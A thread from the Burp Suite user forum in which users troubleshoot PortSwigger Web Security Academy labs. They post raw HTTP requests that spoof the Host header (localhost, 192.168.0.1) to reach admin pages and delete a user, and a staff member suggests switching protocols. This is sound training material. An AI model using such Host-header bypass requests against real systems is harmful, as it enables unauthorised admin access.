The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab: Host header authentication bypass seems broken

Marie | Last updated: Mar 21, 2023 11:53AM UTC

After quite some trial and error and taking a look at the solution, it seems the lab is broken in its current state. Submitting the following request based on the solution will result in the server not responding and simply closing the connection:

```http
GET /admin HTTP/2
Host: localhost
Cookie: _lab=[REDACTED]; session=[REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
```

or on the built-in Chrome browser:

```http
GET /admin/delete?username=carlos HTTP/2
Host: localhost
Cookie: _lab=[REDACTED]; _lab=[REDACTED]; session=[REDACTED]
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```

Whether this is done via Firefox or the built-in Chrome browser does not matter; neither receives an answer. I have only once received a response when navigating to /admin, but when resending the unchanged request, it would not return a response anymore.

This is being tried from a Kali VM with Burp Suite Professional at v2023.2.3.

Ben, PortSwigger Agent | Last updated: Mar 22, 2023 08:10AM UTC

Hi Marie, If you specifically change the Protocol value to HTTP/1 within the Request attributes section of the Inspector - do your Repeater requests now function and allow you to solve this lab?

kairosdev | Last updated: Mar 29, 2023 06:14PM UTC

I'm having some trouble too. When I send the request from repeater, like this one:

```http
GET /admin HTTP/1.1
Host: 192.168.0.1
Cookie: _lab=46%7cMCwCFHhVjvQ7odm5E9CjHajiwme91RbIAhQuRYX1dOrEreRwYiHPPD6%2f8sl79d%2f63ofjmj4X1jtVmbVOiNVuoe8w%2bC%2bzxTGbvBXntW7ghbxPnMGbzpX4RxvG2xNuQuofgPKWzq%2fUkPYHoC6Ss7VeTI3aWNZ2hcjfZCwGYIq257NM3RE%3d; session=UJIGvWmJ2QIzKRi8ktLhNCF0YfyasQmn
Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a200049041f33c6c2a754b6007f00cf.web-security-academy.net/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
```

I always receive this response:

```http
HTTP/1.1 301 Moved Permanently
Location: https://0a200049041f33c6c2a754b6007f00cf.web-security-academy.net/
Connection: close
Keep-Alive: timeout=10
Content-Length: 0
```

Any idea?

Ben, PortSwigger Agent | Last updated: Mar 30, 2023 08:24AM UTC

Hi Kairos, Just to clarify, this is in relation to the same lab that the user in the opening post was having issues with (the 'Host header authentication bypass' lab)?

kairosdev | Last updated: Mar 30, 2023 08:41AM UTC

I don't know. I'm referring to "Host validation bypass via connection state attack".

Ben, PortSwigger Agent | Last updated: Mar 30, 2023 10:42AM UTC